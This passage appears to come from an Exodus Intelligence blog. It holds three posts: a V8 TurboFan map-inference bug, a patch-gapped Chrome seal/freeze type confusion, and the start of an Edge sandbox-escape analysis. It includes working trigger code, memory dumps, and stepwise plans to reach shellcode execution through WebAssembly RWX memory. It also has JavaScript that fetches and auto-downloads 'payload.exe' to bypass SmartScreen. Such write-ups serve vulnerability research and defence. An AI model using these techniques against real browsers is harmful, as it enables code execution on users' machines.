      if (IsSame(receiver, effect)) return kNoReceiverMaps;
      
      // Continue with the next {effect}.
      effect = NodeProperties::GetEffectInput(effect);
    }
}

The changed function, NodeProperties::InferReceiverMapsUnsafe is called through the MapInference::MapInference constructor. It is used to walk the effect chain of the compiled function backward from the use of an object as a receiver for a function call and find the set of possible maps that the object can have. For example, when encountering a CheckMaps node on the effect chain, the compiler can be sure that the map of the object can only be what the CheckMaps node looks for. In the case of the JSCreate node indicated in the vulnerability, if it creates the receiver the compiler tries to infer the possible maps for, the initial map of the created object is returned. However, if the JSCreate is for a different object than the receiver, it is assumed that it cannot change the map of the receiver. The vulnerability results from this oversight, as JSCreate accesses the prototype of the new target, which can be intercepted by a Proxy. This can cause arbitrary user JS code to execute.

In the patched version, if a JSCreate is encountered on the effect chain, the inference result is marked as unreliable. The compiler can still optimize based on the inferred maps but has to guard for them explicitly, fixing the issue.

The MapInference class is used mainly by the JSCallReducer optimizer of TurboFan, which attempts to special-case or inline some function calls based on the inferred maps of their receiver objects. The regression test included with the patch is shown below.

let a = [0, 1, 2, 3, 4];
function empty() {}
function f(p) {
  a.pop(Reflect.construct(empty, arguments, p));
}
let p = new Proxy(Object, {
  get: () => (a[0] = 1.1, Object.prototype)
});
function main(p) {
  f(p);
}
%PrepareFunctionForOptimization(empty);
%PrepareFunctionForOptimization(f);
%PrepareFunctionForOptimization(main);
main(empty);
main(empty);
%OptimizeFunctionOnNextCall(main);
main(p);

The issue is triggered in function f, through Array.prototype.pop. The Reflect.construct call is turned into a JSCreate operation, which will run user JS code if a Proxy is passed in that intercepts the prototype get access. While the pop function does not take an argument, providing the return value of Reflect.construct as one ensures that there is an effect edge between the resulting JSCreate and JSCall nodes so that the vulnerability can be triggered.

The function implementing reduction of calls to Array.prototype.pop is JSCallReducer::ReduceArrayPrototypePop, its code is shown below.

Reduction JSCallReducer::ReduceArrayPrototypePop(Node* node) {
  ...
  Node* receiver = NodeProperties::GetValueInput(node, 1);
  Node* effect = NodeProperties::GetEffectInput(node);
  Node* control = NodeProperties::GetControlInput(node);
  MapInference inference(broker(), receiver, effect);
  if (!inference.HaveMaps()) return NoChange();
  MapHandles const& receiver_maps = inference.GetMaps();
  std::vector<ElementsKind> kinds;
  if (!CanInlineArrayResizingBuiltin(broker(), receiver_maps, &kinds))  {
    return inference.NoChange();
  }
  if (!dependencies()->DependOnNoElementsProtector()) UNREACHABLE();
  inference.RelyOnMapsPreferStability(dependencies(), jsgraph(), &effect, control, p.feedback());
  std::vector<Node*> controls_to_merge;
  std::vector<Node*> effects_to_merge;
  std::vector<Node*> values_to_merge;
  Node* value = jsgraph()->UndefinedConstant();
  Node* receiver_elements_kind = LoadReceiverElementsKind(receiver, &effect, &control);
  Node* next_control = control;
  Node* next_effect = effect;
  for (size_t i = 0; i < kinds.size(); i++) {      
  // inline pop for every inferred receiver map element kind and dispatch as appropriate
  ...
  }

If the receiver maps of the call can be inferred, it replaces the JSCall to the runtime Array.prototype.pop with an implementation specialized to the element kinds of the inferred maps. Line 14 creates a MapInference object which invokes NodeProperties::InferReceiverMapsUnsafe, which infers the map(s) and also returns kReliableReceiverMaps. Based on this return value RelyOnMapsPreferStability won’t insert map checks or code dependencies. This changes in the patched version, as encountering a JSCreate during the effect chain walk will change the return value to kUnreliableReceiverMaps, which makes RelyOnMapsPreferStability insert the needed checks.

So what happens in the regression test? The array a is defined with PACKED_SMI_ELEMENTS element kind. When the f function is optimized on the third invocation of mainReflect.construct is turned into a JSCreate node, a.pop into a JSCall with an effect edge between the two. Then the JSCall is reduced based on the inferred map information, which is incorrectly marked as reliable, so no map check will be done after the Reflect.construct call. When invoked with the Proxy argument, the user JS code changes the element kind of a to PACKED_DOUBLE_ELEMENTS, then the inlined pop operates on it as if it was still a packed SMI array, leading to a type confusion.

There are many callsites of the MapInference constructor but those that look the most immediately useful are the JSCallReducers for the pop, push and shift array functions.

Exploitation

To exploit the vulnerability, it is first necessary to understand pointer compression, a recent improvement to v8. It is a scheme on 64-bit architectures to save memory by using 32-bit pointers into a 4GB-aligned, 4GB in size compressed heap. According to measurements by the developers, this saves 30-40% on the memory usage of v8. From an exploitation perspective, this has several implications:

  • on 64-bit platforms, SMIs and tagged pointers are now 32-bit in size, while doubles in unboxed arrays storage remain 64-bit
  • it adds the additional step of achieving arbitrary read/write within the compressed heap to an exploit

The vulnerability grants the addrof and fakeobj primitives readily, as we can treat unboxed double values as tagged pointers or the other way around. However, since pointer compression made tagged pointers 4-byte, it is also possible to write out-of-bounds by using a DOUBLE_ELEMENTS array, turning it into a tagged/SMI ELEMENTS array in the Proxy getter and using Array.prototype.push to add an element to this confused array. The code below uses this to modify the length of a target array to an arbitrary value.

let a = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1];
var b;
a.pop();
a.pop();
a.pop();
function empty() {}
function f(nt) {
    a.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 0.2 : 156842065920.05);
}
let p = new Proxy(Object, {
    get: function() {
        a[0] = {};
        b = [0.2, 1.2, 2.2, 3.2, 4.3];
        return Object.prototype;
    }
});
function main(o) {
  return f(o);
}
%PrepareFunctionForOptimization(empty);
%PrepareFunctionForOptimization(f);
%PrepareFunctionForOptimization(main);
main(empty);
main(empty);
%OptimizeFunctionOnNextCall(main);
main(p);
console.log(b.length);   // prints 819

When Line 15 converts a into HOLEY_ELEMENTS storage, its elements storage is reallocated and the unboxed double values are converted to HeapNumbers, which are just compressed pointers to a map and the double value. This makes the array shrink to half in size, then the following push call will still treat the array as if it had HOLEY_DOUBLE storage, writing to length*8, instead of length*4. We use this to corrupt the length of the b array.

At this point, the corrupted array can be conveniently used for relative OOB reads and writes with unboxed double values. From here on, exploitation follows these steps:

  • implementing addrof: can be done by allocating an object after the corrupted float array that can be used to set an inline property on it. This inline property can be read out through the corrupted array.
  • getting absolute read/write access to the compressed heap: place an array with PACKED_DOUBLE_ELEMENTS element kind after the corrupted array, change its elements pointer using the corrupted array to the desired location and read through it.
  • getting absolute uncompressed read/write: TypedArrays use 64-bit backing store pointers as they will support allocations larger than what fits on the compressed heap. Placing a TypedArray after the corrupted array and modifying its backing store thus gives absolute uncompressed read/write access.
  • code execution: load a WASM module, leak the address of the RWX mapping storing the code of one of its functions, replace it with shellcode.

The exploit code can be found here. Note that there’s no sandbox escape vulnerability included.

Conclusion

It took us around 3 days to exploit the vulnerability after discovering the fix. Considering that a potential attacker would try to couple this with a sandbox escape and also work it into their own framework, it seems safe to say that 1day vulnerabilities are impractical to exploit on a weekly or bi-weekly release cycle, hence the title of this post.

Another interesting development that affects exploit development for v8 is pointer compression. It does not complicate matters significantly (it was not meant to do that, anyway) but it might present interesting new avenues for exploitation. For example the things that reside at the beginning of the heap, the roots, the native context, the table of builtins, are now all at predictable and writable compressed addresses.

The timely analysis of these 1day and nday vulnerabilities is one of the key differentiators of our Exodus nDay Subscription. It enables our customers to ensure their defensive measures have been implemented properly even in the absence of a proper patch from the vendor. This subscription also allows offensive groups to test mitigating controls and detection and response functions within their organizations. Corporate SOC/NOC groups also make use of our nDay Subscription to keep watch on critical assets.

The post A EULOGY FOR PATCH-GAPPING CHROME appeared first on Exodus Intelligence.

Patch-gapping Google Chrome

9 September 2019 at 08:57

Patch-gapping is the practice of exploiting vulnerabilities in open-source software that are already fixed (or are in the process of being fixed) by the developers before the actual patch is shipped to users. This window, in which the issue is semi-public while the user-base remains vulnerable, can range from from days to months. It is increasingly seen as a serious concern, with possible in-the-wild uses detected by Google. In a previous post, we demonstrated the feasibility of developing a 1day exploit for Chrome well before a patch is rolled out to users. In a similar vein, this post details the discovery, analysis and exploitation of another recent 1day vulnerability affecting Chrome.

Background

Besides analyzing published vulnerabilities, our nDay team also identifies possible security issues while the fixes are in development. An interesting change list on chromium-review piqued our interest in mid-August. It was for an issue affecting sealed and frozen objects, including a regression test that triggered a segmentation fault. It has been abandoned (and deleted) since then in favor of a different patch approach, with work continuing under CL 1760976, which is a much more involved change.

Since the fix turned out to be so complex, the temporary solution for the 7.7 v8 branch was to disable the affected functionality. This will only be rolled into a stable release on the 10th of September, though. A similar change was made in the 7.6 branch but it came two days after a stable channel update to 76.0.3809.132, so it wasn’t included in that release. As such, the latest stable Chrome release remains affected. These circumstances made the vulnerability an ideal candidate to develop a 1day exploit for.

The commit message is descriptive, the issue is the result of the effects of Object.preventExtensions and Object.seal/freeze on the maps and element storage of objects and how incorrect map transitions are followed by v8 under some conditions. Since map handling in v8 is a complex topic, only the absolutely necessary details will be discussed that are required to understand the vulnerability. More information on the relevant topics can be found under the following links:

Object Layout In v8

JS engines implement several optimizations on the property storage of objects. A common technique is to use separate backing stores for the integer keys (often called elements) and string/Symbol keys (usually referred to as slots or named properties). This allows the engines to potentially use continuous arrays for properties with integer keys, where the index maps directly to the underlying storage, speeding up access. String keyed values are also stored in an array but to get the index corresponding to the key, another level of indirection is needed. This information, among other things, is provided by the map (or HiddenClass) of the object.

The storage of object shapes in a HiddenClass is another attempt at saving storage space. HiddenClasses are similar in concept to classes in object-oriented languages. However, since it is not possible to know the property configuration of objects in a prototype-based language like JavaScript in advance, they are created on demand. JS engines only create a single HiddenClass for a given shape, which is shared by every object that has the same structure. Adding a named property to an object results in the creation of a new HiddenClass, which contains the storage details for all the previous properties and the new one, then the map of the object is updated, as shown below (figures from the v8 dev blog).

These transitions are saved in a HiddenClass chain, which is consulted when new objects are created with the same named properties, or the properties are added in the same order. If there is a matching transition, it is reused, otherwise a new HiddenClass is created and added to the transition tree.

The properties themselves can be stored in three places. The fastest is in-object storage, which only needs a lookup for the key in the HiddenClass to find the index into the in-object storage space. This is limited to a certain number of properties, others are stored in the so-called fast storage, which is a separate array pointed by the properties member of the object, as shown below.

If an object has many properties added and deleted, it can get expensive to maintain the HiddenClasses. V8 uses heuristics to detect such cases and migrate the object to a slow, dictionary based property storage, as shown on the following diagram.

Another frequent optimization is to store the integer keyed elements in a dense or packed format, if they can all fit in a specific representation, e.g. small integer or float. This bypasses the usual value boxing in the engines, which stores numbers as pointers to Number objects, thus saving space and speeding up operations on the array. V8 handles several such element kinds, for example PACKED_SMI_ELEMENTS, which denotes an elements array with small integers stored contiguously. This storage format is tracked in the map of the object and needs to be kept updated all the time to avoid type confusion issues. Element kinds are organized into a lattice, transitions are only ever allowed to more general types. This means that adding a float value to an object with PACKED_SMI_ELEMENTS elements kind will convert every value to double, set the newly added value and change the element kind to PACKED_DOUBLE_ELEMENTS.

preventExtensions, seal and freeze

JavaScript provides several ways to fix the set of properties on an object.

  • Object.preventExtensions: prevents new properties from being added to the object.
  • Object.seal: prevents the addition of new properties, as well as the reconfiguration of existing ones (changing their writable, enumerable or configurable attributes).
  • Object.freeze: the same as Object.seal but also prevent the changing of property values, thus effectively prohibiting any change to an object.

PoC analysis

The vulnerability arises because v8 follows map transitions in certain cases without updating the element backing store accordingly, which can have wide-ranging consequences. A modified trigger with comments is shown below.

// Based on test/mjsunit/regress/regress-crbug-992914.js

function mainSeal() {
  const a = {foo: 1.1};   // a has map M1
  Object.seal(a);         // a transitions from M1 to M2 Map(HOLEY_SEALED_ELEMENTS)

  const b = {foo: 2.2};   // b has map M1
  Object.preventExtensions(b);  // b transitions from M1 to M3 Map(DICTIONARY_ELEMENTS)
  Object.seal(b);         // b transitions from M3 to M4
  const c = {foo: Object} // c has map M5, which has a tagged `foo` property, causing the maps of `a` and `b` to be deprecated
  b.__proto__ = 0;        // property assignment forces migration of b from deprecated M4 to M6

  a[5] = 1;               // forces migration of a from the deprecated M2 map, v8 incorrectly uses M6 as new map without converting the backing store. M6 has DICTIONARY_ELEMENTS while the backing store remained unconverted.
}

mainSeal();

In the proof-of-concept code, two objects, a and b are created with the same initial layout, then a is sealed and Object.preventExtensions and Object.seal is called on b. This causes a to switch a map with HOLEY_SEALED_ELEMENTS elements kind and b is migrated to slow property storage via a map with DICTIONARY_ELEMENTS elements kind.

The vulnerability is triggered in lines 10-13. Line 10 creates object c with an incompatibly typed foo property. This causes a new map with a tagged foo property to be created for c and the maps of a and b are marked deprecated. This means that they will be migrated to a new map on the next property set operation. Line 11 triggers the transition for b, Line 13 triggers it for a. The issue is that v8 mistakenly assumes that a can be migrated to the same map as b but fails to also convert the backing store. This causes a type confusion to happen between a FixedArray (the Properties array shown in the Object Layout In v8 section) and a NumberDictionary (the Properties Dict).

A type confusion the other way around is also possible, as demonstrated by another regression test in the patch. There are probably also other ways this invalid map transition could be turned into an exploitable primitive, for example by breaking assumptions made by the optimizing JIT compiler.

Exploitation

The vulnerability can be turned into an arbitrary read/write primitive by using the type confusion shown above to corrupt the length of an Array, then using that Array for further corruption of TypedArrays. These can then be leveraged to achieve arbitrary code execution in the renderer process.

FixedArray and NumberDictionary Memory Layout

FixedArray is the C++ class used for the backing store of several different JavaScript objects. It has a simple layout, shown below, with only a map pointer, a length field stored as a v8 small integer (essentially a 31-bit integer left-shifted by 32), then the elements themselves.

pwndbg> job 0x065cbb40bdf1
 0x65cbb40bdf1: [FixedDoubleArray]
 map: 0x1d3f95f414a9 
 length: 16
 0: 0.1
 1: 1
 2: 2
 3: 3
 4: 4
 …
 pwndbg> tel 0x065cbb40bdf0 25
 00:0000   0x65cbb40bdf0 -> 0x1d3f95f414a9 <- 0x1d3f95f401
 01:0008   0x65cbb40bdf8 <- 0x1000000000
 02:0010   0x65cbb40be00 <- 0x3fb999999999999a
 03:0018   0x65cbb40be08 <- 0x3ff0000000000000
 04:0020   0x65cbb40be10 <- 0x4000000000000000
 … 

The NumberDictionary class implements an integer keyed hash table on top of FixedArray. Its layout is shown below. It has four additional members besides map and length:

  • elements: the number of elements stored in the dictionary.
  • deleted: number of deleted elements.
  • capacity: number of elements that can be stored in the dictionary. The length of the FixedArray backing a number dictionary will be three times its capacity plus the extra header members of the dictionary (four).
  • max number key index: the greatest key stored in the dictionary.

The vulnerability makes it possible to set these four fields to arbitrary values in a plain FixedArray, then trigger the type confusion and treat them as header fields of a NumberDictionary.

pwndbg> job 0x2d7782c4bec9
0x2d7782c4bec9: [NumberDictionary]
- map: 0x0c48e8bc16d9 <Map>
- length: 28
- elements: 4
- deleted: 0
- capacity: 8
- elements: {
0: 0x0c48e8bc04d1 <undefined> -> 0x0c48e8bc04d1 <undefined>
1: 0 -> 16705
2: 0x0c48e8bc04d1 <undefined> -> 0x0c48e8bc04d1 <undefined>
3: 1 -> 16706
4: 0x0c48e8bc04d1 <undefined> -> 0x0c48e8bc04d1 <undefined>
5: 0x0c48e8bc04d1 <undefined> -> 0x0c48e8bc04d1 <undefined>
6: 2 -> 16707
7: 3 -> 16708
}

pwndbg> tel 0x2d7782c4bec9-1 25
00:0000   0x2d7782c4bec8 -> 0xc48e8bc16d9 <- 0xc48e8bc01
01:0008   0x2d7782c4bed0 <- 0x1c00000000
02:0010   0x2d7782c4bed8 <- 0x400000000
03:0018   0x2d7782c4bee0 <- 0x0
04:0020   0x2d7782c4bee8 <- 0x800000000
05:0028   0x2d7782c4bef0 <- 0x100000000
06:0030   0x2d7782c4bef8 -> 0xc48e8bc04d1 <- 0xc48e8bc05
...
09:0048   0x2d7782c4bf10 <- 0x0
0a:0050   0x2d7782c4bf18 <- 0x414100000000
0b:0058   0x2d7782c4bf20 <- 0xc000000000
0c:0060   0x2d7782c4bf28 -> 0xc48e8bc04d1 <- 0xc48e8bc05
...
0f:0078   0x2d7782c4bf40 <- 0x100000000
10:0080   0x2d7782c4bf48 <- 0x414200000000
11:0088   0x2d7782c4bf50 <- 0xc000000000

Elements in a NumberDictionary are stored as three slots in the underlying FixedArray. E.g. the element with the key 0 starts at 0x2d7782c4bf10 above. First comes the key, then the value, in this case a small integer holding 0x4141, then the PropertyDescriptor denoting the configurable, writable, enumerable attributes of the property. The 0xc000000000 PropertyDescriptor corresponds to all three attributes set.

The vulnerability makes all header fields of a NumberDictionary, except length, controllable by setting them to arbitrary values in a plain FixedArray, then treating them as header fields of a NumberDictionary by triggering the issue. While the type confusion can also be triggered in the other direction, it did not yield any immediately promising primitives. Further type confusions can also be caused by setting up a fake PropertyDescriptor to confuse a data property with an accessor property but these also proved too limited and were abandoned.

The capacity field is the most interesting from an exploitation perspective, since it is used in most bounds calculations. When attempting to set, get or delete an element, the HashTable::FindEntry function is used to get the location of the element corresponding to the key. Its code is shown below.

// Find entry for key otherwise return kNotFound.
template <typename Derived, typename Shape>
int HashTable<Derived, Shape>::FindEntry(ReadOnlyRoots roots, Key key,
			int32_t hash) {
	uint32_t capacity = Capacity();
	uint32_t entry = FirstProbe(hash, capacity);
	uint32_t count = 1;
	// EnsureCapacity will guarantee the hash table is never full.
	Object undefined = roots.undefined_value();
	Object the_hole = roots.the_hole_value();
	USE(the_hole);
	while (true) {
		Object element = KeyAt(entry);
		// Empty entry. Uses raw unchecked accessors because it is called by the
		// string table during bootstrapping.
		if (element == undefined) break;
		if (!(Shape::kNeedsHoleCheck && the_hole == element)) {
			if (Shape::IsMatch(key, element)) return entry;
		}
		entry = NextProbe(entry, count++, capacity);
	}
	return kNotFound;
}

The hash tables in v8 use quadratic probing with a randomized hash seed. This means that the hash argument in the code, and the exact layout of dictionaries in memory will change from run to run. The FirstProbe and NextProbe functions, shown below, are used to look for the location where the value is stored. Their size argument is the capacity of the dictionary and thus, attacker-controlled.

inline static uint32_t FirstProbe(uint32_t hash, uint32_t size) {
	return hash & (size - 1);
}

inline static uint32_t NextProbe(uint32_t last, uint32_t number, uint32_t size) {
	return (last + number) & (size - 1);
}

Capacity is a power-of-two number under normal conditions and masking the probes with capacity-1 results in limiting the range of accesses to in-bounds values. However, setting the capacity to a larger value via the type-confusion will result in out-of-bounds accesses. The issue with this approach is the random hash seed, which will cause probes and thus out-of-bounds accesses to random offsets. This can easily results in crashes, as v8 will try to interpret any odd value as a tagged pointer.

A possible solution is to set capacity to an out-of-bounds number k that is a power-of-two plus one. This causes the FindEntry algorithm to only visit two possible locations, one at offset zero, and one at offset k (times three). With careful padding, a target Array can be placed following the dictionary, which has its length property at just that offset. Invoking a delete operation on the dictionary with a key that is the same as the length of the target Array will cause the algorithm to replace the length with the hole value. The hole is a valid pointer to a static object, in effect a large value, allowing the target Array to be used for more convenient, array-based out-of-bounds read and write operations.

While this method can work, it is nondeterministic due to the randomization and the degraded nature of the corrupted NumberDictionary. However, failure does not crash Chrome and is easily detectable; reloading the page reinitializes the hash seed so the exploit can be attempted an arbitrary number of times.

Arbitrary Code Execution

The following object layout is used to gain arbitrary read/write access to the process memory space:

  • o: the object that will be used to trigger the vulnerability.
  • padding: an Array that is used as padding to get the target float array at exactly the right offset from o.
  • float_array: the Array that is the target of the initial length corruption via the out-of-bounds element deletion on o.
  • tarr: a TypedArray used to corrupt the next typed array.
  • aarw_tarr: typed array used for arbitrary memory access.
  • obj_addrof: object used to implement the addrof primitive which leaks the address of an arbitrary JavaScript object.

The exploit achieves code execution by the following the usual steps after the initial corruption:

  • Create the layout described above.
  • Trigger the vulnerability, corrupt the length of float_array through the deletion of a property on o. Restart the exploit by reloading the page in case this step fails.
  • Corrupt the length of tarr to increase reliability, since continued usage of the corrupted float array can introduce problems.
  • Corrupt the backing store of aarw_tarr and use it to gain arbitrary read write access to the address space.
  • Load a WebAssembly module. This maps a read-write-executable memory region of 4KiB into the address space.
  • Traverse the JSFunction object hierarchy of an exported function from the WebAssembly module using the arbitrary read/write primitive to find the address of the read-write-executable region.
  • Replace the code of the WebAssembly function with shellcode and execute it by invoking the function.

The complete exploit code can be found on our GitHub page and seen in action below. Note that a separate vulnerability would be needed to escape the sandbox employed by Chrome.

Detection

The exploit doesn’t rely on any uncommon features or cause unusual behavior in the renderer process, which makes distinguishing between malicious and benign code difficult without false positive results.

Mitigation

Disabling JavaScript execution via the Settings / Advanced settings / Privacy and security / Content settings menu provides effective mitigation against the vulnerability.

Conclusion

Subscribers of our nDay feed had access to the analysis and functional exploit 5 working days after the initial patch attempt appeared on chromium-review. A fix in the stable channel of Chrome will only appear in version 77, scheduled to be released tomorrow.

Malicious actors probably have capabilities based on patch-gapping. Timely analysis of such vulnerabilities allows our customers to test how their defensive measures hold up against unpatched security issues. It also enables offensive teams to test the detection and response functions within their organization.

The post Patch-gapping Google Chrome appeared first on Exodus Intelligence.

Pwn2Own 2019: Microsoft Edge Sandbox Escape (CVE-2019-0938). Part 2

27 May 2019 at 09:31

By Arthur Gerkis

This is the second part of the blog post on the Microsoft Edge full-chain exploit. It provides analysis and describes exploitation of a logical vulnerability in the implementation of the Microsoft Edge browser sandbox which allows arbitrary code execution with Medium Integrity Level.

Background

Microsoft Edge employs various Inter-Process Communication (IPC) mechanisms to communicate between content processes, the Manager process and broker processes. The one IPC mechanism relevant to the described vulnerability is implemented as a set of custom message passing functions which extend the standard Windows API PostMessage() function. These functions look like the following:

  • edgeIso!IsoPostMessage(ulong, ulong, ulong, ulong, ulong, _GUID)
  • edgeIso!IsoPostMessageUsingDataInBuffer(ulong, bool)
  • edgeIso!IsoPostMessageUsingVirtualAddress(ulong, ulong, ulong, ulong, uchar *, ulong)
  • edgeIso!IsoPostMessageWithoutBuffer(ulong, ulong, ulong, ulong, _GUID)
  • edgeIso!LCIEPostMessage(ulong, ulong, ulong, ulong, ulong)
  • edgeIso!LCIEPostMessageWithDISPPARAMS(ulong, ulong, uint, ulong, long, tagDISPPARAMS *, int)
  • edgeIso!LCIEPostMessageWithoutBuffer(ulong, ulong, ulong, ulong)

The listed functions are used to send messages with or without data and are stateless. No direct way to get the result of an operation is supported. The functions return only the result of the message posting operation, which does not guarantee that the requested action has completed successfully. The main goal of these functions is to trigger certain events (e.g. when a user is clicking on the navigation panel), signal state information, and notification of user interface changes.

Messages are sent to the windows of the current process or the windows of the Manager process. A call to PostMessage() is chosen when the message is sent to the current process. For the inter-process messaging a shared memory section and Windows events are employed. The implementation details are hidden from the developer and the direction of the message is chosen based on the value of the window handle. Each message has a unique identifier which denotes the kind of action to perform as a response to the trigger.

Messages that are supposed to be created as a reaction to a user triggered event are passed from one function to another through the virtual layer of different handlers. These handlers process the message and may pass the message further with a different message identifier.

The Vulnerability

The Microsoft Edge Manager process accepts messages from other processes, including content process. Some messages are meant to be run only internally, without crossing process boundaries. A content process can send messages which are supposed to be sent only within the Manager process. If such a message arrives from a content process, it is possible to forge user clicks and thus download and launch an arbitrary binary.

When the download of an executable file is initiated (either by JavaScript code or by user request) the notification bar with buttons appears and the user is offered three options: “Run” to run the offered file, “Download” to download, or “Cancel” to cancel. If the user clicks “Run”, a series of messages are posted from one Manager process window to another. It is possible to see what kind of messages are passed in the debugger by using following breakpoints:

bu edgeIso!LCIEPostMessage ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
bu edgeIso!LCIEPostMessageWithoutBuffer ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
bu edgeIso!LCIEPostMessageWithDISPPARAMS ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
bu edgeIso!IsoPostMessage ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
bu edgeIso!IsoPostMessageWithoutBuffer ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
bu edgeIso!IsoPostMessageUsingVirtualAddress ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"

There are a large number of messages sent during the navigation and subsequent file download, which forms a complex order of actions. The following list represents a simplified description of the actions performed by either a content process (CP) or the Manager process (MP) during ordinary user activities:

  1. a user clicks on a link to navigate (or the navigation is triggered by JavaScript code)
  2. a navigation event is fired (messages sent from CP to MP)
  3. messages for the modal download notification bar creation and handling are sent (CP to MP)
  4. the modal notification bar appears
  5. messages to handle the navigation and the state of the history are sent (CP to MP)
  6. messages are sent to handle DOM events (CP to MP)
  7. the download is getting handled again; messages with relevant download information are passed (CP to MP)
  8. the user clicks “Run” to run the file download
  9. messages are sent about the state of the download (MP to CP)
  10. the CP responds with updated file download information and terminates download handling in its own process
  11. the MP picks up file download handling and starts sending messages to its own Windows (MP to MP)
  12. the MP starts the security scan of the downloaded file (MP to MP)
  13. if the scan has completed successfully, a message is sent to the broker process to run the file
  14. the “browser_broker.exe” broker process launches the executable file

The first message in the series of calls is the response to the user’s click and it initiates the actual series of message passing events. Next follows a message which is important for the exploit because the call stack includes the function which the exploit will imitate. Excerpt of the debugger log file looks like the following:

edgeIso!LCIEPostMessage (00007ffe`d46ab110)(00000402, 00000402, 00000c65, ...)
 # Child-SP          RetAddr           Call Site
00 0000005d`65cfe928 00007ffe`af8de928 edgeIso!LCIEPostMessage
01 0000005d`65cfe930 00007ffe`af696d18 EMODEL!DownloadStateProgress::LCIESendToDownloadManager+0x118
02 0000005d`65cfe9b0 00007ffe`af696b1d EMODEL!CDownloadSecurity::_SendStateChangeMessage+0xe0
03 0000005d`65cfead0 00007ffe`af6954f5 EMODEL!CDownloadSecurity::_OnSecurityChecksComplete+0xa5
04 0000005d`65cfeb00 00007ffe`af6878c8 EMODEL!CDownloadSecurity::OnSecurityCheckCallback+0x45
05 0000005d`65cfeb30 00007ffe`af686dc2 EMODEL!CDownloadManager::OnDownloadSecurityCallback+0x58
06 0000005d`65cfeb70 00007ffe`af4604b7 EMODEL!CDownloadManager::HandleDownloadMessage+0x11e
07 0000005d`65cfed40 00007ffe`d469cccf EMODEL!LCIEAuthority::LCIEAuthorityManagerWinProc+0x2067
08 0000005d`65cff410 00007ffe`d469d830 edgeIso!IsoDispatchMessageToArtifacts+0x54f
09 0000005d`65cff520 00007fff`08506d41 edgeIso!_IsoThreadMessagingWindowProc+0x1f0

The last message sent is important as well, it has the identifier 0xd6b and it initiates running the file. Excerpt of the debugger log file looks like the following:

edgeIso!IsoPostMessage (00007ffe`d46ad8c0)(00000402, 00000402, 00000d6b, ...)
 # Child-SP          RetAddr           Call Site
00 0000005d`656fefc8 00007ffe`af62b4c6 edgeIso!IsoPostMessage
01 0000005d`656fefd0 00007ffe`af62b962 EMODEL!TFlatIsoMessage&amp;amp;lt;DownloadOperation&amp;amp;gt;::Post+0x9a
02 0000005d`656ff040 00007ffe`af62b7bf EMODEL!SpartanCore::DownloadsHandler::SendCommand+0x4e
03 0000005d`656ff0b0 00007ffe`af62ac07 EMODEL!SpartanCore::DownloadsHandler::ReportLaunchFailure+0xc3
04 0000005d`656ff110 00007ffe`af43be99 EMODEL!SpartanCore::DownloadsHandler::InvokeCommand+0x117
05 0000005d`656ff190 00007ffe`af43f0c3 EMODEL!CLayerBase::InvokeCommand+0x159
06 0000005d`656ff210 00007ffe`af43e78a EMODEL!CAsyncBoundaryLayer::_ProcessRequest+0x503
07 0000005d`656ff340 00007fff`08506d41 EMODEL!CAsyncBoundaryLayer::s_WndProc+0x19a
08 0000005d`656ff480 00007fff`08506713 USER32!UserCallWinProcCheckWow+0x2c1
09 0000005d`656ff610 00007fff`016ffef4 USER32!DispatchMessageWorker+0x1c3

The message sent by SpartanCore::DownloadsHandler::SendCommand() is spoofed by the exploit code.

Exploit Development

The exploit code is completely implemented in Javascript and calls the required native functions from Javascript.

The exploitation process can be divided into the following stages:

  1. changing location origin of the current document
  2. executing the JavaScript code which offers to run the download file
  3. posting a message to the Manager process which triggers the file to be run
  4. restoring original location.

Depending on the location of the site, the Edge browser may warn the user about potentially unsafe file download. In the case of internet sites, the user is always warned. As well the Edge browser checks the referrer of the download and may refuse to run the downloaded file even when the user has explicitly chosen to run the file. Additionally, the downloaded file is scanned with Microsoft Windows Defender SmartScreen which blocks any file from running if the file is considered malicious. This prevents a successful attack.

However, when a download is initiated from the “file://” URL and the download referrer is also from the secure zone (or without a zone as is the case with the “blob:” protocol), the downloaded file is not marked with the “Mark of the Web” (MotW). This completely bypasses checks by Microsoft Defender SmartScreen and allows running the downloaded file without any restrictions.

For the first step the exploit finds the current site URL and overwrites it with a “file:///” zone URL. The URL of the site is found by reading relevant pointers in memory. After the site URL is overwritten, the renderer process treats any download that is coming from the current site as coming from the “file:///” zone.

For the second step the exploit executes the JavaScript code which fetches the download file from the remote server and offers it as a download:

let anchorElement = document.createElement('a');
fetch('payload.bin').then((response) =&amp;amp;gt; {
  response.blob().then(
    (blobData) =&amp;amp;gt; {
      anchorElement.href = URL.createObjectURL(blobData);
      anchorElement.download = 'payload.exe';
      anchorElement.click();
    }
  );
});

The executed JavaScript initiates the file download and internally the Edge browser caches the file and keeps a temporary copy as long as the user has not responded to the download notification bar. Before any file download, a Globally Unique Identifier (GUID) is created for the actual download file. The Edge browser recognizes downloads not by the filename or the path, but by the download GUID. Messages which send commands to do any file operation must pass the GUID of the actual file. Therefore it is required to find the actual file download GUID. The required GUID is created by the content process during the call to EdgeContent!CDownloadState::Initialize():

.text:0000000180058CF0 public: long CDownloadState::Initialize(class CInterThreadMarshal *, struct IStream *, unsigned short const *, struct _GUID const &amp;amp;amp;, unsigned short const *, struct IFetchDownloadContext *) proc near
...
.text:0000000180058E6F loc_180058E6F:
.text:0000000180058E6F                 mov     edi, 8007000Eh
.text:0000000180058E74                 test    rbx, rbx
.text:0000000180058E77                 jz      loc_180058FF0
.text:0000000180058E7D                 test    r13b, r13b
.text:0000000180058E80                 jnz     short loc_180058E93
.text:0000000180058E82                 lea     rcx, [rsi+74h]  ; pguid
.text:0000000180058E86                 call    cs:__imp_CoCreateGuid

